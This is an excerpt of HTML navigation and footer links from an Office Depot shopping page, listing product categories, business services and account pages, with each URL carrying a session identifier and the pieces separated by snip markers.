<h4><a href="/a/browse/office-machines/N=5+509740/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Office Machines</a>
...[SNIP]...
<li><a href="/a/browse/calculators/N=5+509745/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Calculators</a>
...[SNIP]...
<li><a href="/a/browse/label-makers-and-tapes/N=5+509760/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Label Makers & Tapes</a>
...[SNIP]...
<li><a href="/a/browse/laminating-machines/N=5+509765/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Laminating Machines</a>
...[SNIP]...
<li><a href="/a/browse/shredders/N=5+509777/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Shredders</a>
...[SNIP]...
<li><a href="/a/browse/office-machines/N=5+509740/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/printers-scanners-copiers-faxes/N=5+509833/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Printers, Scanners, Copiers, Faxes</a>
...[SNIP]...
<li><a href="/a/browse/all-in-ones/N=5+509834/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">All-In-Ones</a>
...[SNIP]...
<li><a href="/a/browse/inkjet-printers/N=5+509855/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Inkjet Printers</a>
...[SNIP]...
<li><a href="/a/browse/laser-printers/N=5+509857/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Laser Printers</a>
...[SNIP]...
<li><a href="/a/browse/wide-format-printers/N=5+509875/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Wide-Format Printers</a>
...[SNIP]...
<li><a href="/a/browse/printers-scanners-copiers-faxes/N=5+509833/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<li>
               <a href="/a/browse/audio-and-video-electronics/N=5+509401/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Audio & Video Electronics</a>
...[SNIP]...
<li>
               <a href="/a/browse/cameras-and-camcorders/N=5+509515/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Cameras & Camcorders</a>
...[SNIP]...
<li>
               <a href="/a/browse/computer-accessories/N=5+509547/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Computer Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/computer-parts-and-upgrades/N=5+509589/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Computer Parts & Upgrades</a>
...[SNIP]...
<li>
               <a href="/a/browse/computers-and-servers/N=5+509612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Computers & Servers</a>
...[SNIP]...
<li>
               <a href="/a/browse/data-storage-and-media/N=5+509625/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Data Storage & Media</a>
...[SNIP]...
<li>
               <a href="/a/browse/ink-toner-and-ribbons/N=5+509666/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Ink, Toner & Ribbons</a>
...[SNIP]...
<li>
               <a href="/a/browse/monitors-and-projectors/N=5+509669/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Monitors & Projectors</a>
...[SNIP]...
<li>
               <a href="/a/browse/networking-and-cables/N=5+509688/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Networking & Cables</a>
...[SNIP]...
<li>
               <a href="/a/browse/office-machines/N=5+509740/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Office Machines</a>
...[SNIP]...
<li>
               <a href="/a/browse/phones-and-accessories/N=5+509793/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Phones & Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/power-protection-and-batteries/N=5+509475/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Power Protection & Batteries</a>
...[SNIP]...
<li>
               <a href="/a/browse/printers-scanners-copiers-faxes/N=5+509833/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Printers, Scanners, Copiers, Faxes</a>
...[SNIP]...
<li>
               <a href="/a/browse/software-and-books/N=5+509895/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Software & Books</a>
...[SNIP]...
<li>
               <a href="/a/browse/warranties-and-services/N=5+509880/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Warranties & Services</a>
...[SNIP]...
<p><a id="v2_nav_technology_1" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15028&redirect=false">$479.99 After $150 Savings on Lenovo Laptop</a>
...[SNIP]...
<p><a id="v2_nav_technology_3" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15030&redirect=false">Tech Depot Services Free PC Check up</a>
...[SNIP]...
<h2>
       <a href="/a/browse/furniture/N=5+917/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1"><span>
...[SNIP]...
<h4><a href="/a/browse/bookcases/N=5+483114/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Bookcases</a>
...[SNIP]...
<li><a href="/a/browse/metal-bookcases/N=5+483117/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Metal Bookcases</a>
...[SNIP]...
<li><a href="/a/browse/wall-units/N=5+501439/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Wall Units</a>
...[SNIP]...
<li><a href="/a/browse/wood-bookcases/N=5+483123/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Wood Bookcases</a>
...[SNIP]...
<li><a href="/a/browse/bookcases/N=5+483114/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/carts-and-stands/N=5+501476/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Carts & Stands</a>
...[SNIP]...
<li><a href="/a/browse/computer-carts/N=5+501479/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Computer Carts</a>
...[SNIP]...
<li><a href="/a/browse/tv-carts-and-stands/N=5+501488/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">TV Carts & Stands</a>
...[SNIP]...
<li><a href="/a/browse/utility-and-book-carts/N=5+501491/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Utility & Book Carts</a>
...[SNIP]...
<li><a href="/a/browse/carts-and-stands/N=5+501476/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/chairs/N=5+501503/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Chairs</a>
...[SNIP]...
<li><a href="/a/browse/folding-and-stacking-chairs/N=5+501504/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Folding & Stacking Chairs</a>
...[SNIP]...
<li><a href="/a/browse/office-chairs/N=5+501507/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Office Chairs</a>
...[SNIP]...
<li><a href="/a/browse/reception-seating/N=5+501516/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Reception Seating</a>
...[SNIP]...
<li><a href="/a/browse/chairs/N=5+501503/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/desks-and-workstations/N=5+501545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Desks & Workstations</a>
...[SNIP]...
<li><a href="/a/browse/commercial-grade-desks/N=5+501546/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Commercial Grade Desks</a>
...[SNIP]...
<li><a href="/a/browse/small-officehome-office-desks/N=5+501556/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Small Office/Home Office Desks</a>
...[SNIP]...
<li><a href="/a/browse/specialty-desking/N=5+501568/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Specialty Desking</a>
...[SNIP]...
<li><a href="/a/browse/desks-and-workstations/N=5+501545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/filing-storage-and-shelving/N=5+501570/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Filing, Storage & Shelving</a>
...[SNIP]...
<li><a href="/a/browse/lateral-file-cabinets/N=5+501573/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Lateral File Cabinets</a>
...[SNIP]...
<li><a href="/a/browse/specialty-filesstorage/N=5+501578/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Specialty Files/Storage</a>
...[SNIP]...
<li><a href="/a/browse/vertical-file-cabinets/N=5+501584/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Vertical File Cabinets</a>
...[SNIP]...
<li><a href="/a/browse/filing-storage-and-shelving/N=5+501570/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/furniture-collections/N=5+501588/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Furniture Collections</a>
...[SNIP]...
<li><a href="/a/browse/christopher-lowell-furniture-collections/N=5+501589/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Christopher Lowell Furniture Collections</a>
...[SNIP]...
<li><a href="/a/browse/modular-furniture-collections/N=5+501802/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Modular Furniture Collections</a>
...[SNIP]...
<li><a href="/a/browse/wood-veneer-furniture-collections/N=5+501822/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Wood Veneer Furniture Collections</a>
...[SNIP]...
<li><a href="/a/browse/furniture-collections/N=5+501588/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<li>
               <a href="/a/browse/bookcases/N=5+483114/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Bookcases</a>
...[SNIP]...
<li>
               <a href="/a/browse/carts-and-stands/N=5+501476/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Carts & Stands</a>
...[SNIP]...
<li>
               <a href="/a/browse/chair-and-floor-mats/N=5+501493/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Chair & Floor Mats</a>
...[SNIP]...
<li>
               <a href="/a/browse/chairs/N=5+501503/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Chairs</a>
...[SNIP]...
<li>
               <a href="/a/browse/desk-and-wall-accessories/N=5+504392/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Desk & Wall Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/desks-and-workstations/N=5+501545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Desks & Workstations</a>
...[SNIP]...
<li>
               <a href="/a/browse/decor-and-accessories/N=5+501525/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">D..cor & Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/filing-storage-and-shelving/N=5+501570/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Filing, Storage & Shelving</a>
...[SNIP]...
<li>
               <a href="/a/browse/furniture-collections/N=5+501588/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Furniture Collections</a>
...[SNIP]...
<li>
               <a href="/a/browse/lighting/N=5+501877/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Lighting</a>
...[SNIP]...
<li>
               <a href="/a/browse/panel-and-cubicle-systems/N=5+501895/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Panel & Cubicle Systems</a>
...[SNIP]...
<li>
               <a href="/a/browse/safes/N=5+501903/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Safes</a>
...[SNIP]...
<li>
               <a href="/a/browse/tables/N=5+501910/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Tables</a>
...[SNIP]...
<p><a id="v2_nav_furniture_1" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15031&redirect=false">$79.99 Save $40 True Innovations Mesh Mid-Back Chair</a>
...[SNIP]...
<h2><a href="/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1"><span>
...[SNIP]...
<h4><a href="/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Custom Printing</a>
...[SNIP]...
<li><a href="/a/browse/business-cards/N=5+2949/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business Cards</a>
...[SNIP]...
<li><a href="/a/browse/stamps-and-daters/N=5+3034/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Stamps & Daters</a>
...[SNIP]...
<li><a href="/a/browse/stationery/N=5+2930+378259/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Stationery</a>
...[SNIP]...
<li><a href="/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Promotional Products</a>
...[SNIP]...
<li><a href="/a/browse/business-and-desk/N=5+4800/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business & Desk</a>
...[SNIP]...
<li><a href="/a/browse/custom-pens-and-pencils/N=5+5276/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Pens & Pencils</a>
...[SNIP]...
<li><a href="/a/browse/custom-drinkware/N=5+4970/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Drinkware</a>
...[SNIP]...
<li><a href="/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business Resource Center</a>
...[SNIP]...
<li><a href="/a/design-print-and-ship/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Document & Copy Services</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/content/businesstools/forms/default.jsp" class="">Business Form Templates</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/content/businesstools/sbh/default.jsp" class="">Small Business Handbook</a>
...[SNIP]...
<li><a href="/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/security-solutions/N=5+8612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Security Solutions</a>
...[SNIP]...
<li><a href="/shred;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">In-Store Shredding Service</a>
...[SNIP]...
<li><a href="/a/browse/property-damage-solutions/N=5+319645/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Property Damage Protection</a>
...[SNIP]...
<li><a href="/a/browse/solutions-for-prevention-of-online-threats/N=5+510451/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Prevention of Online Threats</a>
...[SNIP]...
<li><a href="/a/browse/security-solutions/N=5+8612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/promo/pages/0928_tech/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Tech Depot Services</a>
...[SNIP]...
<li><a href="/a/browse/repair-upgrade-services/N=5+509889/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Repair & Upgrade Your Computer</a>
...[SNIP]...
<li><a href="/a/browse/network-services/N=5+509887/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Connect Your Wireless Network</a>
...[SNIP]...
<li><a href="/a/promo/pages/0928_tech/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/odservicesBody.jsp&template=customerservice" class="">Partner Services</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/partners/fax2mail.jsp" class="">Fax Via Email</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/partners/bbnational.jsp" class="">High Speed Internet</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0127_google.jsp" class="">Google Business Resource Center</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/odservicesBody.jsp&template=customerservice" class="see_all">See all</a>
...[SNIP]...
<li class=""><a href="/a/business-resource-center/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Business Resource Center</a>
...[SNIP]...
<li><a href="/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Custom Printing</a>
...[SNIP]...
<li><a href="/a/design-print-and-ship/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Copy & Print Depot</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/odservicesBody.jsp&template=customerservice">Partner Services</a>
...[SNIP]...
<li><a href="/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Promotional Products</a>
...[SNIP]...
<li><a href="/a/browse/security-solutions/N=5+8612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Security Solutions</a>
...[SNIP]...
<li><a href="/a/promo/pages/0928_tech/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Tech Depot Services</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0928_recycling.jsp&template=customerservice">Tech Recycling</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/webcafe/main.jsp">Webcafe</a>
...[SNIP]...
<h2>


                                                   <a href="https://www.officedepot.com/account/accountSummaryDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1 accountLogin">My Account</a>
...[SNIP]...
<li>


                   <a href="https://www.officedepot.com/account/accountSummaryDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="accountLogin">My Account Overview</a>
...[SNIP]...
<li>
                       <a href="https://www.officedepot.com/account/editContactDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847522&jvalidator=5W7oKmVCxwu%2BVdepVt1BMw%3D%3D" class="accountLogin">Account Settings</a>
...[SNIP]...
<li>
                               <a href="https://www.officedepot.com/orderhistory/orderHistoryList.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Order Tracking/History</a>
...[SNIP]...
<li>
                       <a href="https://www.officedepot.com/account/editBillingDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="accountLogin">Payment Preferences</a>
...[SNIP]...
<li>
                       <a href="https://www.officedepot.com/account/shippingListDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="accountLogin">Address Book</a>
...[SNIP]...
<li>
                           <a href="/csl/listAll.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847523&jvalidator=euDUVKp%2Bb%2BhWjIe7QTbpVw%3D%3D" class="accountLogin">Shopping Lists</a>
...[SNIP]...
<li>
                           <a href="https://www.officedepot.com/orderhistory/submitReturn.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?searchFromDate=12/26/2010&searchToDate=01/25/2011" class="accountLogin">Submit Return</a>
...[SNIP]...
<li class="first"><a href="/a/ink-toner-and-ribbons/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Ink & Toner</a>
...[SNIP]...
<li><a href="/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Paper</a>
...[SNIP]...
<li id='seeAll'>
                       <a href="/catalog/AZ.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">View All Products A-Z</a>
...[SNIP]...
<li class=""><a href="https://www.officedepot.com/orderhistory/orderHistoryAnonDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Order Tracking</a>
...[SNIP]...
<li class="map"><a href="/a/site-map/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Visit Site Map</a>
...[SNIP]...
<span id='exploreSmartShopping'><a id="azAd2" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=10207&redirect=false">Products by Name</a>
...[SNIP]...
<span id='pppAndLeasingOptions'><a id="azAd3" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=10206&redirect=false" onclick="window.open('/adRedir.do?ciid=10206&redirect=false','OfficeDepot','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=1,resizable=1,width=520,height=520');return false" TARGET=_BLANK>Product Plans & Leasing Options</a>
...[SNIP]...
<div id="siteBreadcrumb">
    <a href="/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Home</a>
...[SNIP]...
<h5><a href="/purchaseGiftCard.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Gift Cards</a>
...[SNIP]...
<p><a href="/purchaseGiftCard.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Buy a Gift Card</a>
...[SNIP]...
<h5><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/creditcard/creditcard.jsp" class="">Credit Cards</a>
...[SNIP]...
<p><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/creditcard/creditcard.jsp" class="">Learn More</a>
...[SNIP]...
<h5><a href="/account/alertsDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Smart Email Deals</a>
...[SNIP]...
<p><a href="/account/alertsDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Sign-up Now!</a>
...[SNIP]...
<span><a href="/a/promo/pages/0711_mobile/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" target="_blank" class="">Mobile Alerts</a>
...[SNIP]...
<li class=""><a href="/a/site-map/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Site Map</a></li>
<li><a href="/a/top-categories/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Top Categories</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/international/international.jsp&template=companyInfo">International</a>
...[SNIP]...
<li><a href="/espanol;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Office Depot en Espa..ol</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/termsofuse.jsp&template=customerService">Terms of Use</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/termsofuse.jsp&template=customerService#l1">Mobile Terms of Use</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/Privacy.jsp&template=customerService">Privacy Policy</a>
...[SNIP]...
<li class=""><a href="/storelocator/input.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Store Locator</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/default.jsp&template=companyInfo">Company Overview</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/index.jsp&template=companyInfo" target='_blank'>About Office Depot..</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/affiliateprogram.jsp&template=companyInfo">Affiliate Program</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/govprogram.jsp&template=companyInfo">Government Programs</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/diversitymissionstatement.jsp&template=companyInfo">Diversity</a>
...[SNIP]...
<li><a href="/renderStaticPage.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/womeninbiz/index.jsp&template=companyInfo">Women in Business</a>
...[SNIP]...
<li><a href="/environment;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" target='_blank'>Environmental Programs</a>
...[SNIP]...
<li><a href="/videogallery;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Video Gallery</a>
...[SNIP]...
<li class=""><a href="/customerservice/index.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Customer Service</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/Refunds.jsp&template=customerService">Refunds and Exchanges</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/customerservice/customerServiceDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Contact Us</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/orderhistory/orderHistoryList.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Order Tracking</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/misc/delivery.jsp">Delivery Info</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/orderhistory/orderHistoryList.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Re-order</a></li>
